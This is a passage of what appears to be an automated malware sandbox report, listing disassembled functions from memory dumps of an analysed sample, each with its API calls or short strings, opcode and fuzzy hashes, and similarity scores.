Instruction ID: de1f448899b521c1e48a761a3b12d777ae937d24bb9826d411a7a7048df5dd67
Opcode Fuzzy Hash: 98ac114855acbeb20a73c0a814fe03d0e22c202cdbc8dfabe443d7878ec937b3
Instruction Fuzzy Hash: E1018C355083449FEB208F05E98AB65FFA0EF14720F08C09ADD498B652D775E858DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001CBE3E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?), ref: 001CBE70

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 25cd4ba7767819a7550e347456a463491c814f1121d48e3d2a8a31c8457d7d57
Instruction ID: f2f13f6fd2162d9c32caf5790532c92890f2082dfc2d812041e5f1118a9fe1a7
Opcode Fuzzy Hash: 25cd4ba7767819a7550e347456a463491c814f1121d48e3d2a8a31c8457d7d57
Instruction Fuzzy Hash: D4F0A435904384DFEB208F05D886BA5FB90EF14720F08C09ADE494B652D375E448CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 001CA372, Relevance: 1.5, APIs: 1, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegCloseKey.KERNEL32(?), ref: 001CA3A4

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 25cd4ba7767819a7550e347456a463491c814f1121d48e3d2a8a31c8457d7d57
Instruction ID: 4351bccaa70835adbfddf2a28926655eb083cfcad471167fc653bd90d9e5da9c
Opcode Fuzzy Hash: 25cd4ba7767819a7550e347456a463491c814f1121d48e3d2a8a31c8457d7d57
Instruction Fuzzy Hash: 44F0AF35540388DFEB218F16D889B65FFA0EF14328F58C09ADD494B652D775E844CA62

Uniqueness

Uniqueness Score: -1.00%

Function 001CA4B6, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 001CA4E5

Memory Dump Source

Source File: 00000007.00000002.704247066.00000000001CA000.00000040.00000001.sdmp, Offset: 001CA000, based on PE: false

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 39d5cf247d292da7ab7777a97a8eb8a7a6191dd1949e48c855fdade4daecaa99
Instruction ID: 00ce7f549185ce806a9b835d23824c83cf2a58fa9060349b88ba6eb5c4a8565e
Opcode Fuzzy Hash: 39d5cf247d292da7ab7777a97a8eb8a7a6191dd1949e48c855fdade4daecaa99
Instruction Fuzzy Hash: FBF0AF355443448FE7108F05D889B65FB90EF10324F48C09ACD094B652D3B5E844CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 00710348, Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

MOC, xrefs: 007105DE

Memory Dump Source

Source File: 00000007.00000002.705058394.0000000000710000.00000040.00000001.sdmp, Offset: 00710000, based on PE: false

Similarity

API ID:
String ID: MOC
API String ID: 0-624257665
Opcode ID: b6cf2df3952948c3339761996fd8011f7df21301c3acfbf955c068cd15ad6667
Instruction ID: 2390991964d1c3f877c80d741cf02c45a2bc5425d8f7256639801f5581b5c9d1
Opcode Fuzzy Hash: b6cf2df3952948c3339761996fd8011f7df21301c3acfbf955c068cd15ad6667
Instruction Fuzzy Hash: 3FA1A030B00645CFC714DF6DC9809AEBBF2BF99700B24892ED65697690CBB4ED91CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003809A9, Relevance: 1.4, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

Pq{, xrefs: 00380A21

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: Pq{
API String ID: 0-1645090721
Opcode ID: 8a6eaf40e29ed1298096534b6ec1fa65f744b1b73d0a4baa12bc66ebd107fb8b
Instruction ID: 7fd93eaf6ab323fb4a3104e789ad5f9e866dbd94d320fe08fc254825de142877
Opcode Fuzzy Hash: 8a6eaf40e29ed1298096534b6ec1fa65f744b1b73d0a4baa12bc66ebd107fb8b
Instruction Fuzzy Hash: B951C431F003069FCB1ABB74C85566EB7B6BF94304F2086AAE456AB754DB30DC05CB81

Uniqueness

Uniqueness Score: -1.00%

Function 003802E8, Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

:@/q, xrefs: 00380537

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: :@/q
API String ID: 0-4216730590
Opcode ID: 52d9cb165624867b1445e80c34d77d532d729783a438fa063a728b847a445266
Instruction ID: 3e6ccfe388b703ef7f16d35a49ab934426ee4d14b60ffe7830d9745102ea4556
Opcode Fuzzy Hash: 52d9cb165624867b1445e80c34d77d532d729783a438fa063a728b847a445266
Instruction Fuzzy Hash: 0551AB34A05305CFEB49EF64C1A0B6D7BF2EF89304F2584AAD506AB7A1DB709C05DB52

Uniqueness

Uniqueness Score: -1.00%

Function 0038E738, Relevance: 1.4, Strings: 1, Instructions: 164COMMON

Download Yara Rule

Strings

trsr, xrefs: 0038E757

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: trsr
API String ID: 0-678784716
Opcode ID: 7073f2a20344b6b8cafd8a4bb00db493c00fd35ef9ab8aab754c9d4bd0cbdcfd
Instruction ID: dce63c5f325c6b14fb4624ca7a6284c3d2a6d1621abd9af3f8164e762a16eed8
Opcode Fuzzy Hash: 7073f2a20344b6b8cafd8a4bb00db493c00fd35ef9ab8aab754c9d4bd0cbdcfd
Instruction Fuzzy Hash: 6451B531E00219DFDF56EF94C8408ADB7B7FF84704B1580AAE906AF255DB30AD05CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00710BC0, Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

S.S, xrefs: 00710D97, 00710D9C

Memory Dump Source

Source File: 00000007.00000002.705058394.0000000000710000.00000040.00000001.sdmp, Offset: 00710000, based on PE: false

Similarity

API ID:
String ID: S.S
API String ID: 0-3166738685
Opcode ID: f8507bd71e87ca5a72815b0d9d47a7b153ad4a02c1be7e86ff5f170bfec0e8a9
Instruction ID: 656ff85aba1628dc6472cf27ce66c43c418295a1270ec9c3b84393afc655ec70
Opcode Fuzzy Hash: f8507bd71e87ca5a72815b0d9d47a7b153ad4a02c1be7e86ff5f170bfec0e8a9
Instruction Fuzzy Hash: EC519370A01209CFDB19EFB9D4416EEB7F1AB85300F20866ED406AB395DB7899C5CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00380682, Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

TwTq, xrefs: 003806BC

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: TwTq
API String ID: 0-3443581126
Opcode ID: 283c8903623c501a6202bc32dd538cf544e3e90bfb982abb17943f862065c220
Instruction ID: fe78a81bfffb03d99c0bdb9ac918c63bd8b2aa0fea7411ceb54207c1542a46c4
Opcode Fuzzy Hash: 283c8903623c501a6202bc32dd538cf544e3e90bfb982abb17943f862065c220
Instruction Fuzzy Hash: 7F417C3120B2418FD709BB74EC1862D3BA6BFA0701724456BF402D76E5EF309C84DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00388A21, Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

xEI, xrefs: 00388AA3

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: xEI
API String ID: 0-665690766
Opcode ID: 3443afc1a63673c87920d024ab0e27ee992849c7956dfa359853e8baf0f07667
Instruction ID: d169a6d62f1b583fd902e315bdc7942f083af1cab46d012c7ab42141523fa234
Opcode Fuzzy Hash: 3443afc1a63673c87920d024ab0e27ee992849c7956dfa359853e8baf0f07667
Instruction Fuzzy Hash: B1417731604304EFDB09FF74E88496D37A6AF953143A184BBE006EB2A8DF799C02DB45

Uniqueness

Uniqueness Score: -1.00%

Function 00710A70, Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

mq, xrefs: 00710B80

Memory Dump Source

Source File: 00000007.00000002.705058394.0000000000710000.00000040.00000001.sdmp, Offset: 00710000, based on PE: false

Similarity

API ID:
String ID: mq
API String ID: 0-769834630
Opcode ID: 54b6c650ecaeecfa888f6c9657ab14189bb7da71a66922acd93768ce29384721
Instruction ID: f768d14db90e08e8a548bec81401a3f7f3dd89e51e1b15eddd38b0ad2e3e691a
Opcode Fuzzy Hash: 54b6c650ecaeecfa888f6c9657ab14189bb7da71a66922acd93768ce29384721
Instruction Fuzzy Hash: 45410E70505B50CFD379DB2EC9557A6BBE2BF84305F14C86EC09646AE0DBB9A8C1DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0038EB88, Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

tDur, xrefs: 0038EBDC

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: tDur
API String ID: 0-1590251624
Opcode ID: d0db6b7b8a38a056508d1a99dcde8eb534f5a1f92d25330c8c1b48e33fd64394
Instruction ID: fc9d63dd1649359dd4fa50f245e2d68f42c28d8509164d84b143aeed92987e35
Opcode Fuzzy Hash: d0db6b7b8a38a056508d1a99dcde8eb534f5a1f92d25330c8c1b48e33fd64394
Instruction Fuzzy Hash: 48313970A003048FCB55EF698580AAEBBF2EF98700B20447DD606AB7A0DA71DD42DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00710D54, Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

S.S, xrefs: 00710D97, 00710D9C

Memory Dump Source

Source File: 00000007.00000002.705058394.0000000000710000.00000040.00000001.sdmp, Offset: 00710000, based on PE: false

Similarity

API ID:
String ID: S.S
API String ID: 0-3166738685
Opcode ID: 548ed3e25c0bbc52b655c978a5181a15b0ae928db81c96f45fcd2ca11b5bf841
Instruction ID: d294ba1c352a3f4e28c17f462a1c842315bdb922dc9a0470b9beb2a6054fd311
Opcode Fuzzy Hash: 548ed3e25c0bbc52b655c978a5181a15b0ae928db81c96f45fcd2ca11b5bf841
Instruction Fuzzy Hash: 7531AF31E016458BDB09EFB9D0002AEB7E2BFD5300F64C66ED405AB285EF74A981CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00710D48, Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

S.S, xrefs: 00710D97, 00710D9C

Memory Dump Source

Source File: 00000007.00000002.705058394.0000000000710000.00000040.00000001.sdmp, Offset: 00710000, based on PE: false

Similarity

API ID:
String ID: S.S
API String ID: 0-3166738685
Opcode ID: 548ed3e25c0bbc52b655c978a5181a15b0ae928db81c96f45fcd2ca11b5bf841
Instruction ID: d294ba1c352a3f4e28c17f462a1c842315bdb922dc9a0470b9beb2a6054fd311
Opcode Fuzzy Hash: 548ed3e25c0bbc52b655c978a5181a15b0ae928db81c96f45fcd2ca11b5bf841
Instruction Fuzzy Hash: 7531AF31E016458BDB09EFB9D0002AEB7E2BFD5300F64C66ED405AB285EF74A981CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 0038D8D1, Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

trsr, xrefs: 0038D966

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: trsr
API String ID: 0-678784716
Opcode ID: c802c6c88d0564359a5183e06cd0e13904e6cf3b53a23b6bcc4bedba62b47c68
Instruction ID: abcc1a37ed2f3c5d16586740ea1bf91648ff59ce294e7f4d4ce1b868174b012a
Opcode Fuzzy Hash: c802c6c88d0564359a5183e06cd0e13904e6cf3b53a23b6bcc4bedba62b47c68
Instruction Fuzzy Hash: 3F31BF31B067419FCB16AF74A85866EBBA6AF8430072481BBD447D76A5EF308801CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00389638, Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

p>I, xrefs: 003896D1

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: p>I
API String ID: 0-3849671435
Opcode ID: 0ac3cf72e2caeafdacacd31872288d396ff1082c294b358ca80fa1b0b9c9f1ca
Instruction ID: 039dea01bce26d23e641e1544c1aa35ee4c0f2bebb2a64e30f7b1838a724e076
Opcode Fuzzy Hash: 0ac3cf72e2caeafdacacd31872288d396ff1082c294b358ca80fa1b0b9c9f1ca
Instruction Fuzzy Hash: 4321C531608341DFCB03BB64C894B79BBE9AF96324B2E81F7D44ACBA51E7219C04D752

Uniqueness

Uniqueness Score: -1.00%

Function 00388BD0, Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

T0I, xrefs: 00388BEB

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: T0I
API String ID: 0-1152553145
Opcode ID: d4fb4be7996d4d1fee400332f0b7ebf631d77890951aff364eb04e2653a52bc7
Instruction ID: 7dcf816684d6b5888df78741281c446963a76c8ab894b42f210fe694de313391
Opcode Fuzzy Hash: d4fb4be7996d4d1fee400332f0b7ebf631d77890951aff364eb04e2653a52bc7
Instruction Fuzzy Hash: 29317C30906309DFCB59EFB4C5406ADBBB5FF05300F6044EAC412AB669DB319A44DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00382656, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

_4q, xrefs: 00382739

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: _4q
API String ID: 0-3039945896
Opcode ID: d3d7e7558feb672efd4564b73c42d83daae8db0fa96e74b85b9d03d9df95d24b
Instruction ID: a54a7879a799cf7901ac3b7e3c57e78fc5d51119d7d43aab8b55002ebf974a8f
Opcode Fuzzy Hash: d3d7e7558feb672efd4564b73c42d83daae8db0fa96e74b85b9d03d9df95d24b
Instruction Fuzzy Hash: DE31AE30E02349CBEB15EF62D44435AB7F1BF85304F15C56EC015AB265DB749988CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00388FC6, Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

_4q, xrefs: 003890A9

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: _4q
API String ID: 0-3039945896
Opcode ID: 22034c100ee866efcac3b3d9c954b0a170e725e779c49006294c0b228642f29e
Instruction ID: 9c746b69e071d4c391ba79ee9fd29802482e513259081f498a53c21ce3cb5d2d
Opcode Fuzzy Hash: 22034c100ee866efcac3b3d9c954b0a170e725e779c49006294c0b228642f29e
Instruction Fuzzy Hash: A3318D31E0034ACFE710EF61D54476EB7F1BF95314F1A91BAC005AB265DBB49886CB85

Uniqueness

Uniqueness Score: -1.00%

Function 003D1530, Relevance: 1.3, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 003D159C

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ba44544299f9497181d2b56f9bcfb42e324520b4faf062ce91e8dcc6d1cccc9e
Instruction ID: a97b136fe0c4ca8bc7628a48dae63dc1d164f062f6f2446b4db20fa724392ce6
Opcode Fuzzy Hash: ba44544299f9497181d2b56f9bcfb42e324520b4faf062ce91e8dcc6d1cccc9e
Instruction Fuzzy Hash: 6D21A1725093C05FEB128B25DC55A92BFA4AF43324F0980DBE9858F663D6659908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0038D9F0, Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

dVq, xrefs: 0038DA2D

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: dVq
API String ID: 0-1362247615
Opcode ID: 491a011a623576f18db01e287d28109c443fb5a713a12c4d9f65e9f1ca2a246f
Instruction ID: 31b51f3724d4be2724b2917b048a62e99da349eb6eabc1d637e54dea66350707
Opcode Fuzzy Hash: 491a011a623576f18db01e287d28109c443fb5a713a12c4d9f65e9f1ca2a246f
Instruction Fuzzy Hash: D221B231C0938ACADF15EFB8C4806EEFBB4BF69304F2481A9C45477286E7B45548CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003D01F4, Relevance: 1.3, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 003D0264

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0b1d1f592830367e1d95a3bc046aa58b01aa1a0e08e6a29e4c8c7fcac43f10b1
Instruction ID: 8962d3171fc4cb49a63cd6333a3843e2b9d22274b4003035f3c3558e1aa59b28
Opcode Fuzzy Hash: 0b1d1f592830367e1d95a3bc046aa58b01aa1a0e08e6a29e4c8c7fcac43f10b1
Instruction Fuzzy Hash: 7D21D5B69053849FD712CF54ED89B91BFA8EF42320F0985DBED848B693D2349808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0038CDB8, Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

5I, xrefs: 0038CDEC

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: 5I
API String ID: 0-1224781598
Opcode ID: 26ad8c6ec0ac31b921da40447dbe33851826bb68bca0a645b18f1110b5f2d8ef
Instruction ID: 4a9b29b637cfa3e0c893f880a8929daea35c60370d0485b9539e4aa5ae69ac9e
Opcode Fuzzy Hash: 26ad8c6ec0ac31b921da40447dbe33851826bb68bca0a645b18f1110b5f2d8ef
Instruction Fuzzy Hash: 7211C130314340DBD715BB28D10063ABB9A9FD6705324C9BEE04B9B781DB76ED028769

Uniqueness

Uniqueness Score: -1.00%

Function 003858E0, Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

_3, xrefs: 003858E0

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: _3
API String ID: 0-3274322546
Opcode ID: dc21fce2eb09e6449ac1c2efd2e028addb99e4405acfdea8a9066a4eef975650
Instruction ID: ca7cfc28ac461104bcb0538b1585c30579aabb345132c490addbf624f2ef7c21
Opcode Fuzzy Hash: dc21fce2eb09e6449ac1c2efd2e028addb99e4405acfdea8a9066a4eef975650
Instruction Fuzzy Hash: B9119A30A00205DFDB01FFB4E881AAE77B6EF56360F2004AAC40197249E7319902CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00380961, Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

=Vq, xrefs: 0038096C

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: =Vq
API String ID: 0-3423587533
Opcode ID: fa49292c14c8161b61d0eb3922aef0f8cfd67ec8e133c232298b2dda2cf465e5
Instruction ID: 1d1705182c62002596e3ae9e77938dc7bfc91c87f39836df563508a698aed65f
Opcode Fuzzy Hash: fa49292c14c8161b61d0eb3922aef0f8cfd67ec8e133c232298b2dda2cf465e5
Instruction Fuzzy Hash: 9C01F5213093044BDB5B76ACA04426E77CA6BE0325F2842BBC18787B51DBB18C4D93D2

Uniqueness

Uniqueness Score: -1.00%

Function 00385148, Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

\3, xrefs: 00385148

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: \3
API String ID: 0-3892797873
Opcode ID: c8252ca9c1a9578c431038c82bd2e2eab6e8296ffc2262b38dfaa908a7ccbcb4
Instruction ID: eea30baa7648f041ffbcb326289a27df34368d7d31706030c2fdc1d93983d9d8
Opcode Fuzzy Hash: c8252ca9c1a9578c431038c82bd2e2eab6e8296ffc2262b38dfaa908a7ccbcb4
Instruction Fuzzy Hash: 7B01C031E017058FDF41FFB898867AF77F9AB85700B2041AAC509E7685EB308901DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0038E139, Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

PUq, xrefs: 0038E160

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: PUq
API String ID: 0-2140217966
Opcode ID: 6dde6a32f575c109b3924e9fde331a8f0d2bbeef2d5b02bdd43e95bf915af1e5
Instruction ID: 671b78603a470d399fe7e516554d88ab3ac60c2a3c1912eb3ff5562830294937
Opcode Fuzzy Hash: 6dde6a32f575c109b3924e9fde331a8f0d2bbeef2d5b02bdd43e95bf915af1e5
Instruction Fuzzy Hash: F8018F31B023149FDB093BB5981862F779ABB98761724487EE50AD7B91DE75CC0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 0038E140, Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

PUq, xrefs: 0038E160

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: PUq
API String ID: 0-2140217966
Opcode ID: a04801cedf33693348fe9fe7426bf6e9e9fbf36a85c57abe977cd29cbaa45cd4
Instruction ID: 5d0d24b3020860c12e8e6ccf009ac394179f32fca87ad1b85495a374e6351602
Opcode Fuzzy Hash: a04801cedf33693348fe9fe7426bf6e9e9fbf36a85c57abe977cd29cbaa45cd4
Instruction Fuzzy Hash: 6201A2317013149FDB093BB69C1862F779EFB89760714443EE506D7791DE758C0187A0

Uniqueness

Uniqueness Score: -1.00%

Function 0038A610, Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

dVq, xrefs: 0038A660

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: dVq
API String ID: 0-1362247615
Opcode ID: 4b959fbea784c1ed0c4ef1fab3b6bb55572cf7036d274712e68e2e1fd90c3338
Instruction ID: 9212ed1cabccb46443f690f3ec2ea0f5a3682369f8f0daebbef60a4f93a7b8be
Opcode Fuzzy Hash: 4b959fbea784c1ed0c4ef1fab3b6bb55572cf7036d274712e68e2e1fd90c3338
Instruction Fuzzy Hash: 0CF04C317097415BF70A3A791850A7D678A6BE17213B943AFF415AF3CADE714C0143A3

Uniqueness

Uniqueness Score: -1.00%

Function 0038790A, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

dVq, xrefs: 00387958

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: dVq
API String ID: 0-1362247615
Opcode ID: fc1193d854c8ff5677e95c4293490a05266be0a005f0e012f211d8eefdb17074
Instruction ID: 271c706fd9f58004edb3746e40ea68fadff74581246fe7ab9ebf2f24ed9c4f12
Opcode Fuzzy Hash: fc1193d854c8ff5677e95c4293490a05266be0a005f0e012f211d8eefdb17074
Instruction Fuzzy Hash: 3AF0F43130D3404BD71A7A695890B792B9B6BD266073507AFE4199F2D6CF718C0293A2

Uniqueness

Uniqueness Score: -1.00%

Function 003D0232, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 003D0264

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 91647bda133004bff4f4e782f1ae7dfe74ae9190ec8070b3a28735791850769e
Instruction ID: 1a7669c6ed9a156474de20ebf1a5e9da88d9fdd921d9a834d46f2f4b7a8d8d6e
Opcode Fuzzy Hash: 91647bda133004bff4f4e782f1ae7dfe74ae9190ec8070b3a28735791850769e
Instruction Fuzzy Hash: C901F2769023409FEB50CF15E889769FB94EF40720F08C8ABDD498BB42D675E844CA61

Uniqueness

Uniqueness Score: -1.00%

Function 003D156A, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 003D159C

Memory Dump Source

Source File: 00000007.00000002.704740609.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a821c7b222cffb696a1bc4a14846feaccceaead07e78ce2fce5fd27215e8e94c
Instruction ID: 92bbb3b0b7ec01090c933cdcb0de033e4a645ede81d8b8e78bfc1b556b8ca9dd
Opcode Fuzzy Hash: a821c7b222cffb696a1bc4a14846feaccceaead07e78ce2fce5fd27215e8e94c
Instruction Fuzzy Hash: 5901F7766013449FE711CF15F985766FB94EF41320F04C0ABDD0A8B742C678E444CB62

Uniqueness

Uniqueness Score: -1.00%

Function 004A07FD, Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

ET\Framework\v2.0.50727\, xrefs: 004A07FD

Memory Dump Source

Source File: 00000007.00000002.704831581.00000000004A0000.00000040.00000040.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID: ET\Framework\v2.0.50727\
API String ID: 0-1338360445
Opcode ID: 3fca0e2421a83ee961acefec39bfd29b715660102ef156848525418d3e8475f3
Instruction ID: fc7d0d2239b101c0e9281fd24fcd67a46aa5c1fd831a8312cb3060fce6ca1a1c
Opcode Fuzzy Hash: 3fca0e2421a83ee961acefec39bfd29b715660102ef156848525418d3e8475f3
Instruction Fuzzy Hash: 2CF0C8B65497806FD7118B06EC41853FFA8DF86630B0AC4AFFD898B612D165B909CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00387918, Relevance: 1.3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

dVq, xrefs: 00387958

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: dVq
API String ID: 0-1362247615
Opcode ID: 3f3303a2134025749868aaad1d562eef404d22d1f7b31ac79ca31ec75728796b
Instruction ID: 65c68e5f9c1fe0fd77a10316ad1cb128a3378be1ee748fabca5efe806a16ea8a
Opcode Fuzzy Hash: 3f3303a2134025749868aaad1d562eef404d22d1f7b31ac79ca31ec75728796b
Instruction Fuzzy Hash: A4F0B43130831557D6187AAE5841B79628BABD1AB0774076EF529AB3C5DF71CC0153E1

Uniqueness

Uniqueness Score: -1.00%

Function 0038A5B8, Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

(@I, xrefs: 0038A5D5

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: (@I
API String ID: 0-912685179
Opcode ID: 15535a017d16337563df3c880cb4821755cefecdbe10004a42ef95958d35767b
Instruction ID: e13162bb22133bd772c4895a1055e08240a3b12fb1df92ca47aa35b152fe82da
Opcode Fuzzy Hash: 15535a017d16337563df3c880cb4821755cefecdbe10004a42ef95958d35767b
Instruction Fuzzy Hash: 7AF0A0327043048B9718BB68E40496D77AAEBD6326328847FE10AEB744DF36DC069746

Uniqueness

Uniqueness Score: -1.00%

Function 00388B49, Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

HVq, xrefs: 00388B8B

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: HVq
API String ID: 0-3168765925
Opcode ID: d8d185a977c4b02bc31e340fce7d3549e48fa62bdea5a11b7f9ed776db143bff
Instruction ID: 091460b94c5598fe23c82249d8e6d7a62692f082e8822db2b2ff8b7f28ae09a0
Opcode Fuzzy Hash: d8d185a977c4b02bc31e340fce7d3549e48fa62bdea5a11b7f9ed776db143bff
Instruction Fuzzy Hash: 69F0A735A053919FCB53AB74EC149A47FF19F8E29132501EAD502DB666CE614C01CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0038A649, Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

dVq, xrefs: 0038A660

Memory Dump Source

Source File: 00000007.00000002.704664028.0000000000380000.00000040.00000001.sdmp, Offset: 00380000, based on PE: false

Similarity

API ID:
String ID: dVq
API String ID: 0-1362247615
